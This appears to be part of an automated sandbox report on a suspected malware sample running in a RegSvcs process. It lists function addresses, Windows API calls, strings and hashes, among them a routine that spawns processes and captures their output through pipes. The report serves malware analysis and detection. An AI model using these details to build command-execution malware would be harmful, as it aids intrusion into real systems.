                                                      • Opcode ID: b11d4a962aa4a2a0845aae4fea630016b8f5c5a8637a8f79b9017eceb009fff5
                                                      • Instruction ID: ed1eade6f59818560fa4daa2aac7664302146382423b6d12c41e9c9b2339d524
                                                      • Opcode Fuzzy Hash: b11d4a962aa4a2a0845aae4fea630016b8f5c5a8637a8f79b9017eceb009fff5
                                                      • Instruction Fuzzy Hash: 2EF0F6363003046FEB245F399D81A7B7B91EF81768F55842EF9058B690C6F59C41C798
                                                      Function 004384BC Relevance: 1.5, APIs: 1, Instructions: 33COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 004326F0: EnterCriticalSection.KERNEL32(-000486C1,?,004339D5,00000000,00463F78,0000000C,0043399C,?,?,0043A7C3,?,?,00436F72,00000001,00000364,00000006), ref: 004326FF
                                                      • EnumSystemLocalesW.KERNEL32(004384AF,00000001,00464198,0000000C,004388DA,00000000), ref: 004384F4
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CriticalEnterEnumLocalesSectionSystem
                                                      • String ID:
                                                      • API String ID: 1272433827-0
                                                      • Opcode ID: 3b5c1364d7cd50fc97924730aefc53fb116b642963b2c1bd3db03a2d45adce8f
                                                      • Instruction ID: 9fc24951d34fa790f1ec3895482986d9505c3f2fe49ddfb93487c91185536aab
                                                      • Opcode Fuzzy Hash: 3b5c1364d7cd50fc97924730aefc53fb116b642963b2c1bd3db03a2d45adce8f
                                                      • Instruction Fuzzy Hash: 8EF03C76A40300AFD704DF99E842B9D77F0EB49725F20406FF4119B2A1DBB989408F49
                                                      Function 004423C8 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00436DD0: GetLastError.KERNEL32(00000000,00000000,?,00437BB7,?,00000000,00000000,?,00438071,00000000,00000000,00000000,00000000,8B18EC83,00464158,00000010), ref: 00436DD5
                                                        • Part of subcall function 00436DD0: SetLastError.KERNEL32(00000000,00000006,000000FF,?,00438071,00000000,00000000,00000000,00000000,8B18EC83,00464158,00000010,00431112,00000000,00000000,00000000), ref: 00436E73
                                                      • EnumSystemLocalesW.KERNEL32(00442321,00000001,FFFFFFFF,?,?,00442B89,-00000050,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 004423FF
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorLast$EnumLocalesSystem
                                                      • String ID:
                                                      • API String ID: 2417226690-0
                                                      • Opcode ID: d22d078ac6dda33add69cb47dc5f89e5addfa278ab2afe83675ca11ae6cb7b22
                                                      • Instruction ID: 99cdb45d3f9d3a368050452263ee8c929fb67b282bee9bca7be4151b212121f8
                                                      • Opcode Fuzzy Hash: d22d078ac6dda33add69cb47dc5f89e5addfa278ab2afe83675ca11ae6cb7b22
                                                      • Instruction Fuzzy Hash: E6F0E53A30020557DB04AF76D94576BBFA4EFC1714F47806AFE058B691C6F99882C7A4
                                                      Function 0042A608 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SetUnhandledExceptionFilter.KERNEL32(Function_0002A614,0042A128), ref: 0042A60D
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ExceptionFilterUnhandled
                                                      • String ID:
                                                      • API String ID: 3192549508-0
                                                      • Opcode ID: 8d06b91f446ef99f71eebbec5f32996093cab5ca771a45d9879e521a318de171
                                                      • Instruction ID: 66bb6caa2bdd3c9d84d0cfa5364d01ae706cc903abfb3adfe59ca4624c321f28
                                                      • Opcode Fuzzy Hash: 8d06b91f446ef99f71eebbec5f32996093cab5ca771a45d9879e521a318de171
                                                      • Instruction Fuzzy Hash:
                                                      Function 004407F2 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: HeapProcess
                                                      • String ID:
                                                      • API String ID: 54951025-0
                                                      • Opcode ID: 42b51d29d7d43180ceb412ccadbdbd3d27969663646f8ef2e2f89b7d034a4083
                                                      • Instruction ID: 36067f364272004dc57d80dd1d131b4701be5925398dae7ba9ff77fe02776256
                                                      • Opcode Fuzzy Hash: 42b51d29d7d43180ceb412ccadbdbd3d27969663646f8ef2e2f89b7d034a4083
                                                      • Instruction Fuzzy Hash: 6FA012306002808F43404F345A0434935DC590058170400399004C4470E67088804705
                                                      Function 004362F2 Relevance: .0, Instructions: 22COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6847a3e9a0d7b7b8402b77278032b4f626891dfa6fd65570ac05521b0549e8d7
                                                      • Instruction ID: 2d736a212e789c36ec4e4cb68e3a434c63faf2050a836131c670e1bdff006d63
                                                      • Opcode Fuzzy Hash: 6847a3e9a0d7b7b8402b77278032b4f626891dfa6fd65570ac05521b0549e8d7
                                                      • Instruction Fuzzy Hash: A8E08C32911268EBCB14EB89C90498AF3FCEB48B04F26409BB911D3240C6B4DF00CBD4
                                                      Function 00408280 Relevance: 30.0, APIs: 16, Strings: 1, Instructions: 257pipeprocessfileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetTempPathA.KERNEL32(00000080,?,?,?,?,?,?,?,?,?), ref: 0040832D
                                                      • CreatePipe.KERNEL32(00000000,00000000,0000000C,00000000), ref: 00408403
                                                      • SetHandleInformation.KERNEL32(00000000,00000001,00000000), ref: 00408415
                                                      • Wow64DisableWow64FsRedirection.KERNEL32(?), ref: 00408459
                                                      • CreateProcessA.KERNEL32 ref: 00408481
                                                      • Wow64RevertWow64FsRedirection.KERNEL32(00000000), ref: 0040848F
                                                      • WaitForSingleObject.KERNEL32(?,00000064), ref: 004084B8
                                                      • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 004084DA
                                                      • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 004084FE
                                                      • ReadFile.KERNEL32(00000000,?,0000007F,00000000,00000000), ref: 00408525
                                                      • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040856A
                                                      • CloseHandle.KERNEL32(?), ref: 00408581
                                                      • CloseHandle.KERNEL32(?), ref: 00408589
                                                      • CloseHandle.KERNEL32(00000000), ref: 00408591
                                                      • CloseHandle.KERNEL32(00000000), ref: 00408599
                                                      • GetLastError.KERNEL32 ref: 004085A3
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Handle$ClosePipeWow64$NamedPeek$CreateRedirection$DisableErrorFileInformationLastObjectPathProcessReadRevertSingleTempWait
                                                      • String ID: D
                                                      • API String ID: 3215130363-2746444292
                                                      • Opcode ID: b28e023fe7403818ef6636384a56b0e5ae5600ff95b125a8a980114813b33f11
                                                      • Instruction ID: db226792efd7a5d372922a60c148993335caeddcf7fe3051bd97c46a50f1f8d9
                                                      • Opcode Fuzzy Hash: b28e023fe7403818ef6636384a56b0e5ae5600ff95b125a8a980114813b33f11
                                                      • Instruction Fuzzy Hash: 2AA18471940228ABEB20DF60DD45FDDB778AF44704F1041EAE908B62D1DB79AE84CF99
                                                      Function 0044008F Relevance: 25.9, APIs: 17, Instructions: 411COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _free$___from_strstr_to_strchr
                                                      • String ID:
                                                      • API String ID: 3409252457-0
                                                      • Opcode ID: 08ce1da051c5e4f6261c3375afccaddf4823e57bc503958558c9874a9af09999
                                                      • Instruction ID: ad342c85d79afc1525fb68db4781c9c5f11ba077349ec04d9f16d3b657b576c0
                                                      • Opcode Fuzzy Hash: 08ce1da051c5e4f6261c3375afccaddf4823e57bc503958558c9874a9af09999
                                                      • Instruction Fuzzy Hash: FED1E871900305AFEB21EFA5C885A6F77B8AF05314F04416FEB01A7381EBB99D11CB5A
                                                      Function 00432A63 Relevance: 22.9, APIs: 15, Instructions: 357COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _free$Info
                                                      • String ID:
                                                      • API String ID: 2509303402-0
                                                      • Opcode ID: 995654ab384135b73c876c0ff2681754972dc2ee05fa6770e1ead01997c3bee8
                                                      • Instruction ID: 1214d5669b359a887c7051222f3a54922eff3f69e2c2072fa8b703e4a9e83790
                                                      • Opcode Fuzzy Hash: 995654ab384135b73c876c0ff2681754972dc2ee05fa6770e1ead01997c3bee8
                                                      • Instruction Fuzzy Hash: 33D18C71D003059FDB21CF69C982BAEBBB5BF1C304F14502EE899A7352DBB8A845CB54
                                                      Function 004299FA Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 51libraryloaderCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • InitializeCriticalSectionAndSpinCount.KERNEL32(00468FA8,00000FA0,?,?,004299D8), ref: 00429A06
                                                      • GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,004299D8), ref: 00429A11
                                                      • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,004299D8), ref: 00429A22
                                                      • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00429A34
                                                      • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00429A42
                                                      • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,004299D8), ref: 00429A65
                                                      • DeleteCriticalSection.KERNEL32(00468FA8,00000007,?,?,004299D8), ref: 00429A81
                                                      • CloseHandle.KERNEL32(00000000,?,?,004299D8), ref: 00429A91
                                                      Strings
                                                      • WakeAllConditionVariable, xrefs: 00429A3A
                                                      • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00429A0C
                                                      • SleepConditionVariableCS, xrefs: 00429A2E
                                                      • kernel32.dll, xrefs: 00429A1D
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
                                                      • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                      • API String ID: 2565136772-3242537097
                                                      • Opcode ID: cd77e9e22f7702d0e8c547e099c978fc9b8415150fa15de595efc219695d84d2
                                                      • Instruction ID: 7cf5ffcbd6923fcff546143913a6234c01ab752e32550092ccb2d7335f4584b8
                                                      • Opcode Fuzzy Hash: cd77e9e22f7702d0e8c547e099c978fc9b8415150fa15de595efc219695d84d2
                                                      • Instruction Fuzzy Hash: 5E019670B41361ABD7245B74BD09B1B3659AB55B92F24016BFC04D22A1EFB8CC00856E
                                                      Function 0044170D Relevance: 19.6, APIs: 13, Instructions: 113COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • ___free_lconv_mon.LIBCMT ref: 00441751
                                                        • Part of subcall function 00440A07: _free.LIBCMT ref: 00440A24
                                                        • Part of subcall function 00440A07: _free.LIBCMT ref: 00440A36
                                                        • Part of subcall function 00440A07: _free.LIBCMT ref: 00440A48
                                                        • Part of subcall function 00440A07: _free.LIBCMT ref: 00440A5A
                                                        • Part of subcall function 00440A07: _free.LIBCMT ref: 00440A6C
                                                        • Part of subcall function 00440A07: _free.LIBCMT ref: 00440A7E
                                                        • Part of subcall function 00440A07: _free.LIBCMT ref: 00440A90
                                                        • Part of subcall function 00440A07: _free.LIBCMT ref: 00440AA2
                                                        • Part of subcall function 00440A07: _free.LIBCMT ref: 00440AB4
                                                        • Part of subcall function 00440A07: _free.LIBCMT ref: 00440AC6
                                                        • Part of subcall function 00440A07: _free.LIBCMT ref: 00440AD8
                                                        • Part of subcall function 00440A07: _free.LIBCMT ref: 00440AEA
                                                        • Part of subcall function 00440A07: _free.LIBCMT ref: 00440AFC
                                                      • _free.LIBCMT ref: 00441746
                                                        • Part of subcall function 004381B6: HeapFree.KERNEL32(00000000,00000000,?,0044115C,?,00000000,?,8B18EC83,?,004413FF,?,00000007,?,?,004418A4,?), ref: 004381CC
                                                        • Part of subcall function 004381B6: GetLastError.KERNEL32(?,?,0044115C,?,00000000,?,8B18EC83,?,004413FF,?,00000007,?,?,004418A4,?,?), ref: 004381DE
                                                      • _free.LIBCMT ref: 00441768
                                                      • _free.LIBCMT ref: 0044177D
                                                      • _free.LIBCMT ref: 00441788
                                                      • _free.LIBCMT ref: 004417AA
                                                      • _free.LIBCMT ref: 004417BD
                                                      • _free.LIBCMT ref: 004417CB
                                                      • _free.LIBCMT ref: 004417D6
                                                      • _free.LIBCMT ref: 0044180E
                                                      • _free.LIBCMT ref: 00441815
                                                      • _free.LIBCMT ref: 00441832
                                                      • _free.LIBCMT ref: 0044184A
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                      • String ID:
                                                      • API String ID: 161543041-0
                                                      • Opcode ID: 421e8ad82638d60d4f2bf5f8f882c7967a0e963893514f791121a05fb283345f
                                                      • Instruction ID: e1aef9339d646358b61db9b664c228359a287d80b96a591002c5e05fd3a7908d
                                                      • Opcode Fuzzy Hash: 421e8ad82638d60d4f2bf5f8f882c7967a0e963893514f791121a05fb283345f
                                                      • Instruction Fuzzy Hash: 87315C316007059FEF31AA3AD845B57B3E9AF54314F18542FF459E7262DF38A881C718
                                                      Function 00440B05 Relevance: 18.4, APIs: 12, Instructions: 373COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _free
                                                      • String ID:
                                                      • API String ID: 269201875-0
                                                      • Opcode ID: 3ee456eb27e964b5e1237088420c456d79425c7376abef841d6f58eaaa567ff0
                                                      • Instruction ID: 35081d4898d8c174db7cff07c485b6c9909d2cd26c7c92c96ef1c0b713dcbd22
                                                      • Opcode Fuzzy Hash: 3ee456eb27e964b5e1237088420c456d79425c7376abef841d6f58eaaa567ff0
                                                      • Instruction Fuzzy Hash: 28C13472D40204BBEF20DBA9CC82FDEB7F89F48704F14456AFA04FB282D67499519B58
                                                      Function 0043B52D Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 301COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID: 0-3907804496
                                                      • Opcode ID: 2fc22eaa2fba05f5c433586aeb192692c20893d7fd2c2faa9929536d3e2adf5b
                                                      • Instruction ID: e25121f3db656d720ad691df7fc7747f8aaffc99c6f70a51cacde16cb71368e4
                                                      • Opcode Fuzzy Hash: 2fc22eaa2fba05f5c433586aeb192692c20893d7fd2c2faa9929536d3e2adf5b
                                                      • Instruction Fuzzy Hash: E2C1E370E04205AFDB15EF99C881BAE7BB4FF4D304F10505AE641AB3A2D7789D41CBA9
                                                      Function 00443A9F Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 273COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00443758: CreateFileW.KERNEL32(00000000,?,?,H;D,?,?,00000000,?,00443B48,00000000,0000000C), ref: 00443775
                                                      • GetLastError.KERNEL32 ref: 00443BB3
                                                      • __dosmaperr.LIBCMT ref: 00443BBA
                                                      • GetFileType.KERNEL32(00000000), ref: 00443BC6
                                                      • GetLastError.KERNEL32 ref: 00443BD0
                                                      • __dosmaperr.LIBCMT ref: 00443BD9
                                                      • CloseHandle.KERNEL32(00000000), ref: 00443BF9
                                                      • CloseHandle.KERNEL32(004373F1), ref: 00443D46
                                                      • GetLastError.KERNEL32 ref: 00443D78
                                                      • __dosmaperr.LIBCMT ref: 00443D7F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                      • String ID: H
                                                      • API String ID: 4237864984-2852464175
                                                      • Opcode ID: 0b7acca7ff21efd52c248cbfc07f57828a5cdf060c2719dab42ceefeeb59b99b
                                                      • Instruction ID: bf4f5638eb42ca3ebbf15a5b1a2230956724fedc9a315eb23496984daa07d82e
                                                      • Opcode Fuzzy Hash: 0b7acca7ff21efd52c248cbfc07f57828a5cdf060c2719dab42ceefeeb59b99b
                                                      • Instruction Fuzzy Hash: E4A16872A041448FDF199F68DC417AE3BA1EB0A725F14015EF811EB3E1D7789E12C75A
                                                      Function 00428D83 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 139threadCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CurrentThread$_xtime_get$Xtime_diff_to_millis2
                                                      • String ID: p"B
                                                      • API String ID: 3943753294-2496714718
                                                      • Opcode ID: f58987ed6803152d80ff081dcb6aa9741f7a17a24e4aabe63951f1421d9a12d3
                                                      • Instruction ID: b9494613ad89904233c4c8616d7ef5b19abcd02311a7f775b862a67f56766807
                                                      • Opcode Fuzzy Hash: f58987ed6803152d80ff081dcb6aa9741f7a17a24e4aabe63951f1421d9a12d3
                                                      • Instruction Fuzzy Hash: BE516F75A01225CFCF10DF54E58056EB7B5AF18311B66856FD806EB2A6CB34EC40CB99
                                                      Function 0042CD22 Relevance: 16.1, APIs: 6, Strings: 3, Instructions: 304COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • IsInExceptionSpec.LIBVCRUNTIME ref: 0042CE1F
                                                      • type_info::operator==.LIBVCRUNTIME ref: 0042CE41
                                                      • ___TypeMatch.LIBVCRUNTIME ref: 0042CF50
                                                      • IsInExceptionSpec.LIBVCRUNTIME ref: 0042D022
                                                      • _UnwindNestedFrames.LIBCMT ref: 0042D0A6
                                                      • CallUnexpected.LIBVCRUNTIME ref: 0042D0C1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                      • String ID: csm$csm$csm
                                                      • API String ID: 2123188842-393685449
                                                      • Opcode ID: 975dbd8c80956f696eb1ae44606a15088a5e6c23c1bffa9d8203406b136770c2
                                                      • Instruction ID: 655c81b4b699c9072965c75339843ae640a888bfaae44cb3f0d0f60482e1d229
                                                      • Opcode Fuzzy Hash: 975dbd8c80956f696eb1ae44606a15088a5e6c23c1bffa9d8203406b136770c2
                                                      • Instruction Fuzzy Hash: 74B1AE71E00229EFCF24DF95E98099EBBB5BF04314F91405BE8146B312D739DA52CB99
                                                      Function 004461EB Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 147COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,00447E5F), ref: 00446204
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: DecodePointer
                                                      • String ID: acos$asin$exp$log$log10$p"B$pow$sqrt
                                                      • API String ID: 3527080286-2023024955
                                                      • Opcode ID: bc4750436cd16cfc427dcb630d1ea129cec79332f73d59e7c2111c7276ad2f39
                                                      • Instruction ID: 103716a7c00a244f8ce639481d3290e96e8c9185ffa3387d5af3837610558f88
                                                      • Opcode Fuzzy Hash: bc4750436cd16cfc427dcb630d1ea129cec79332f73d59e7c2111c7276ad2f39
                                                      • Instruction Fuzzy Hash: 8351AE7090460ADBEF109F98D9481BE7BB0FF46304F568197D891A7264CBBC8929CB4F
                                                      Function 00436CB8 Relevance: 15.1, APIs: 10, Instructions: 69COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • _free.LIBCMT ref: 00436CCE
                                                        • Part of subcall function 004381B6: HeapFree.KERNEL32(00000000,00000000,?,0044115C,?,00000000,?,8B18EC83,?,004413FF,?,00000007,?,?,004418A4,?), ref: 004381CC
                                                        • Part of subcall function 004381B6: GetLastError.KERNEL32(?,?,0044115C,?,00000000,?,8B18EC83,?,004413FF,?,00000007,?,?,004418A4,?,?), ref: 004381DE
                                                      • _free.LIBCMT ref: 00436CDA
                                                      • _free.LIBCMT ref: 00436CE5
                                                      • _free.LIBCMT ref: 00436CF0
                                                      • _free.LIBCMT ref: 00436CFB
                                                      • _free.LIBCMT ref: 00436D06
                                                      • _free.LIBCMT ref: 00436D11
                                                      • _free.LIBCMT ref: 00436D1C
                                                      • _free.LIBCMT ref: 00436D27
                                                      • _free.LIBCMT ref: 00436D35
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _free$ErrorFreeHeapLast
                                                      • String ID:
                                                      • API String ID: 776569668-0
                                                      • Opcode ID: 67f969143d03c9affedaca358c1804249c33e22b039fe45e179ea83905326dea
                                                      • Instruction ID: f40358984851a5f8c640c5ca8d5019647707d0affb3cee205547921b939e223c
                                                      • Opcode Fuzzy Hash: 67f969143d03c9affedaca358c1804249c33e22b039fe45e179ea83905326dea
                                                      • Instruction Fuzzy Hash: E921DD76910108BFCF02EF95C941DDD7BB8AF48344F05916AB615AB221EF35D645CB84
                                                      Function 00413AF0 Relevance: 14.4, APIs: 1, Strings: 7, Instructions: 367COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CloseOpenQueryValue
                                                      • String ID: 111$246122658369$JiKw4PF0$PBB+$PL==$Xv==$Zyt=
                                                      • API String ID: 3677997916-3628501398
                                                      • Opcode ID: a6c2fce4a15154d88bc8ee0771131d291fa26bd5780db9fef4d5426fc4d8c020
                                                      • Instruction ID: 6184e63d1b7c2a8ad63c82ab1a565c8d7b0fda82aee2bf261ff8028f749fae9d
                                                      • Opcode Fuzzy Hash: a6c2fce4a15154d88bc8ee0771131d291fa26bd5780db9fef4d5426fc4d8c020
                                                      • Instruction Fuzzy Hash: BEE1B370A00248DBDF14EFA9C9457DDBFB5AB45308F90415EE8016B2C2D7B95A88CB96
                                                      Function 00440F24 Relevance: 13.7, APIs: 9, Instructions: 199COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _free
                                                      • String ID:
                                                      • API String ID: 269201875-0
                                                      • Opcode ID: 3e60926460e5dee230fda889ff166cbf03b0eef5f22a907dbfab3c18ab379cd4
                                                      • Instruction ID: cdc686c59964d0c1a7244e800e48506e79ea9828b7ba20c8ec72f6b3d747e873
                                                      • Opcode Fuzzy Hash: 3e60926460e5dee230fda889ff166cbf03b0eef5f22a907dbfab3c18ab379cd4
                                                      • Instruction Fuzzy Hash: 1361E171900300AFEB20DF65C881BABB7F8AB48310F14416FF955AB292EB749981CB59
                                                      Function 00425E20 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 141COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • __Mtx_unlock.LIBCPMT ref: 00425EF7
                                                      • std::_Rethrow_future_exception.LIBCPMT ref: 00425F49
                                                      • std::_Rethrow_future_exception.LIBCPMT ref: 00425F59
                                                        • Part of subcall function 00403A60: __Mtx_unlock.LIBCPMT ref: 00403B54
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Mtx_unlockRethrow_future_exceptionstd::_
                                                      • String ID: 0EF$$@$$@
                                                      • API String ID: 3298230783-2852628486
                                                      • Opcode ID: 514f0463402807daebb188547ec718d8be1c03c2344213b36238a621a070ef2c
                                                      • Instruction ID: b67377ac9edb6bd196156b0a533391f4c45c5f068d87db9be408f0d8ab52f92a
                                                      • Opcode Fuzzy Hash: 514f0463402807daebb188547ec718d8be1c03c2344213b36238a621a070ef2c
                                                      • Instruction Fuzzy Hash: 88412E71E007185BDB10EBA5E841BAFBBB89F05304F40456FF54163642EB396944C76A
                                                      Function 00404830 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 140COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • ___std_exception_copy.LIBVCRUNTIME ref: 0040499F
                                                        • Part of subcall function 0042B056: RaiseException.KERNEL32(E06D7363,00000001,00000003,004025DC,00420D37,8B18EC83,?,004025DC,?,004644CC), ref: 0042B0B6
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ExceptionRaise___std_exception_copy
                                                      • String ID: 0*@$0*@$ios_base::badbit set$pI@$pI@$$@
                                                      • API String ID: 3109751735-465750908
